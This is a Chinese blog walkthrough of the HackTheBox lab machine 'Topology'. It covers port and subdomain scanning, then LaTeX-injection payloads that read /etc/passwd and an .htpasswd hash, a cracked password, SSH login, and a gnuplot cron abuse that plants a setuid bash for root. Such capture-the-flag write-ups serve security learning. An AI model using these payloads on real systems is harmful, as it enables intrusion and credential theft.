HackTheBox系列-Topology

已于 2023-11-16 14:15:43 修改
阅读量81 收藏
点赞数
分类专栏: HackTheBox 文章标签: 网络安全 靶机 HackTheBox
于 2023-11-16 14:14:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43264813/article/details/134440252
版权

Topology

1、使用nmap进行端口扫描

nmap -p- --min-rate 10000 10.10.11.217

在这里插入图片描述在这里插入图片描述
2、使用浏览器访问80端口发现是一个网页,对其进行信息收集

在网站主页面发现域名:topology.htb
在网站源码中发现域名:latex.topology.htb

在这里插入图片描述在这里插入图片描述
3、将发现的域名添加到/etc/hosts文件中

在这里插入图片描述
4、对所发现的域名进行子域名爆破

gobuster vhost -u http://topology.htb --append-domain -w subnames-oneforall.txt -t 100

在这里插入图片描述
5、使用浏览器访问后发现latex是一个可正常访问的子域名并且可以遍历目录,其中equation.php是一个latex表达式生成界面,根据内容信息可知输入**\frac{x+5}{y-3}**可输出对应的图片
在这里插入图片描述在这里插入图片描述在这里插入图片描述
6、 从互联网中搜索关于latex表达式的漏洞信息,存在laTex表达式注入漏洞
在这里插入图片描述
7、使用payload进行尝试注入读取/etc/passwd文件,发现被防护,使用"$“和”["皆被防护

\input{/etc/passwd}
$\input{/etc/passwd}$
[\input{/etc/passwd}]

在这里插入图片描述
8、查阅资料使用\lstinputlisting进行读取

$\lstinputlisting{/etc/passwd}$

在这里插入图片描述
9、继续读取用户名的hash值

$\lstinputlisting{/var/www/dev/.htpasswd}$

在这里插入图片描述
10、hashid进行识别该hash值
在这里插入图片描述
11、使用hashcat进行破解得到密码

vdaisley : $apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTYO

vdaisley/calculus20

在这里插入图片描述
12、使用获得的用户口令ssh登录服务器
在这里插入图片描述
13、获取user的flag

8bc9ffdd5*******************

在这里插入图片描述
14、本地使用python启http服务,靶机中下载pspy64并附加执行权限
在这里插入图片描述
15、执行pspy64查看分析结果,可以看到find /opt/gunplot -name *.plt -exec gunplot {}
这条命令,在/opt/gunplot这个目录下搜索 *.plt的文件,然后作为gunplot的参数执行
在这里插入图片描述
16、根据资料进行提权

http://www.gnuplot.info/docs_4.2/node327.html


echo "system 'cp /bin/bash /tmp/yebai;chmod u+s /tmp/yebai'" > yebai.plt
## 将字符串 system 'cp /bin/bash /tmp/yebai;chmod u+s /tmp/yebai' 写入文件 yebai.plt。该字符串包含两个命令,分别是将 /bin/bash 复制到 /tmp/yebai 并赋予其 setuid 权限。

cp yebai.plt /opt/gnuplot/yebai.plt
## 将文件 someb0dy.plt 复制到目录 /opt/gnuplot/ 中,并重命名为 yebai.plt。

cd /tmp
## 进入tmp目录下

./yebai -p
## 执行可执行文件 yebai,并使用 -p 选项进行操作

在这里插入图片描述在这里插入图片描述

夜白君
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[转]高负载并发网站架构分析
bluehire的专栏
12-23 2万+
由于自己正在做一个高性能大用户量的论坛程序,对高性能高并发服务器架构比较感兴趣,于是在网上收集了不少这方面的资料和大家分享。希望能和大家交流 msn: defender_ios@hotmail.com ——————————————————————————————————————— ? 初创网站与开源软件 6 ? 谈谈大型高负载网站服务器的优化心得! 8 ? Lighttpd+Squid+Apach
HackTheBox Topology】打靶记录
失心少年
09-20 316
看了网上的解题过程,同样的方式依然写不进去,这里只能按照已只的文件去读取。正常来说,这里是可以写文件进去的,但是我试了好多,都没有成功,被拦截。这个域名下面的应用可以利用laTex表达式生成pdf文件。通过工具查询到其加密方式为MD5(APR)比如输入 \frac{x+5}{y-3}该加密类型再hashcat 中为1600。就目前来看,第三个可能存在利用点比较大。通过hashcat 破解到密码。用破解到的密码成功ssh登录。读取一个密钥进行解密。网上找到相关利用方式。
《设计模式》作者John Vlissides-UMLChina访谈录
rolt的专栏
10-13 1496
透明,think,Qingrun 整理 2001年9月20日,面向对象技术专家、IBM研究中心研究员、软件开发的里程碑著作《设计模式》的作者John Vlissides在UMLCHINA(http://www.umlchina.com)的“嘉宾聊天室”里与中国的软件开发者在线畅谈。下面是部分交流实录。 (补注:John Vlissides于2005年11月14日因脑部肿瘤去世,享年44岁。) 关于软件开发技术 huangcy 您能告诉我们在框架和软件构架之间有什么重要的区别么?我经常在一些
高负载高并发网站架构分析
热门推荐
leirainy的专栏
12-21 5万+
由于自己正在做一个高性能大用户量的论坛程序,对高性能高并发服务器架构比较感兴趣,于是在网上收集了不少这方面的资料和大家分享。希望能和大家交流 msn: defender_ios@hotmail.com ———————————————————————————————————————  初创网站与开源软件 6  谈谈大型高负载网站服务器的优化心得! 8  Lighttpd+S
ØMQ中文翻译文档
kevin的博客
08-26 1万+
英语原文链接 翻译文档已上传到本人GitHub,目前只翻译了一部分,很多都是直译(英语一般==),欢迎一起来翻译~ 如果您需要转载,请注明出处。 ØMQ - The Guide [Table of Contents](javascript:
zmq 中文文档
weixin_34854320的博客
01-22 4822
ØMQ - The Guide [Table of Contents](javascript:???? By Pieter Hintjens, CEO of iMatix Please use the issue tracker for all comments and errata. This version covers the latest stable release of ZeroMQ (3.2). If you are using older versions of ZeroMQ then so
游戏引擎架构 (Jason Gregory 著)
weixin_34010949的博客
06-05 3522
第一部分 基础 第1章 导论 第2章 专业工具 第3章 游戏软件工程基础 第4章 游戏所需的三维数学 第二部分 低阶引擎系统 第5章 游戏支持系统 第6章 资源及文件系统 第7章 游戏循环及实时模拟(已看) 第8章 人体学接口设备(HID) 第9章 调试及开发工具 第三部分 图形及动画 第10章 渲染引擎 第11章 动画系统 第12章 碰撞及刚体动力学 第四部分 游...
unetlab-topology-export.zip
03-21
"unetlab-topology-export.zip"这个压缩包就是为网络学习者提供的一系列实验拓扑配置,帮助他们模拟真实网络环境,加深理解。 Eve-NG(Emulated Environment Next Generation)是一个强大的网络仿真平台,它支持...
Fundamental-Principles-Behind-the-Sigma-Delta-ADC-Topology-Part-2_cn.pdf
06-05
sigma-delta技术,用提高精度,很值得学习其原理,应用到高精度设计中
vue-flow-topology:Flow Topology 是基于Vue-cli3.0 + Ant Design Vue + JSPlumb开发的一个大数据流水线拓展流程工作台,该项目可以看做是一个独立的 Vue 项目,也可以嵌入到其他vue项目中使用,新版会作为优先版本持续迭代
05-07
vue-flow-topology 介绍 vue-flow-topology 该项目可以看做是一个独立的 Vue 项目(大数据流水线拓展流程工作台),也可以嵌入到其他vue项目中使用,新版会作为优先版本持续迭代。 版本一:基于 Vue-cli3.0 + view-...
topology-scanner-main.zip
11-07
Topology-Scanner是WeOps团队免费开放的一个网络拓扑自动扫描模块,可以自动发现网络设备的类型、网络设备之间的互联
messaging-topology-operator:RabbitMQ消息传递拓扑运算符
04-10
RabbitMQ消息传递拓扑Kubernetes运营商Kubernetes运营商...则可以运行以下命令来安装消息传递拓扑运算符: kubectl apply -f https://github.com/rabbitmq/messaging-topology-operator/releases/latest/download/me
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8346
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
开题报告宠物医院管理系统的设计与实现 已通过开题答辩的.docx
07-25
随着人们生活水平的提高和精神需求的增加,宠物已经成为很多家庭的重要成员,宠物市场的规模和潜力也不断扩大。宠物医院作为宠物健康保障的重要机构,需要适应市场的发展和变化,提供更加专业和便捷的服务。宠物医院的业务和信息涉及多个方面,如科室信息、医生信息、坐诊信息、药品信息、挂号信息、网站公告信息等。如果采用传统的手工或半自动化的管理方式,会造成信息的分散、混乱、更新困难、查询不便等问题,影响管理的效率和质量。系统能够通过计算机技术和网络技术对宠物医院业务进行集中管理。它可以实现信息的录入、存储、查询、修改、删除、统计、分析、展示等功能,方便宠物医院的管理人员和工作人员进行业务操作和决策支持。宠物医院管理系统还可以利用网络技术,向宠物主人和宠物爱好者提供在线的服务和咨询,方便宠物主人和宠物爱好者了解和关爱自己的宠物,增强宠物医院的社会影响力和竞争力。综上所述,宠物医院管理系统是一个具有实际意义和应用价值的选题,它可以为宠物医院的管理和服务提供有效的支持,为宠物主人和宠物爱好者提供便捷的服务和咨询,为宠物的健康和福利做出贡献。
主成分分析算法Python代码.txt
最新发布
07-25
数学建模模型python实例。
Linux环境安装Redis 6.2.9
07-25
Linux环境安装Redis 6.2.9
b107校园悬赏任务平台-springboot+vue+elementui.zip(可运行源码+sql文件+文档)
07-25
校园悬赏任务平台对字典管理、论坛管理、任务资讯任务资讯公告管理、接取用户管理、任务管理、任务咨询管理、任务收藏管理、任务评价管理、任务订单管理、发布用户管理、管理员管理等进行集中化处理。经过前面自己查阅的网络知识,加上自己在学校课堂上学习的知识,决定开发系统选择小程序模式这种高效率的模式完成系统功能开发。这种模式让操作员基于浏览器的方式进行网站访问,采用的主流的Java语言这种面向对象的语言进行校园悬赏任务平台程序的开发,在数据库的选择上面,选择功能强大的Mysql数据库进行数据的存放操作。校园悬赏任务平台的开发让用户查看任务信息变得容易,让管理员高效管理任务信息。 校园悬赏任务平台具有管理员角色,用户角色,这几个操作权限。 校园悬赏任务平台针对管理员设置的功能有:添加并管理各种类型信息,管理用户账户信息,管理任务信息,管理任务资讯公告信息等内容。 校园悬赏任务平台针对用户设置的功能有:查看并修改个人信息,查看任务信息,查看任务资讯公告信息等内容。 系统登录功能是程序必不可少的功能,在登录页面必填的数据有两项,一项就是账号,另一项数据就是密码,当管理员正确填写并提交这二者数据之后,管理员就可以进入系统后台功能操作区。项目管理页面提供的功能操作有:查看任务,删除任务操作,新增任务操作,修改任务操作。任务资讯公告信息管理页面提供的功能操作有:新增任务资讯公告,修改任务资讯公告,删除任务资讯公告操作。任务资讯公告类型管理页面显示所有任务资讯公告类型,在此页面既可以让管理员添加新的任务资讯公告信息类型,也能对已有的任务资讯公告类型信息执行编辑更新,失效的任务资讯公告类型信息也能让管理员快速删除。
Matlab实现蚁狮优化算法ALO-TCN-Multihead-Attention多输入单输出回归预测算法研究.rar
07-25
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
Topology hackthebox
06-12
Topology 是一道来自 Hack The Box 平台的网络安全挑战题目,它的难度为中等偏难。这个挑战涉及到了网络拓扑结构的设计和实现,需要掌握一定的网络知识和技能。在这个挑战中,你需要构建一个拓扑结构,包含多个网络...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜白君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值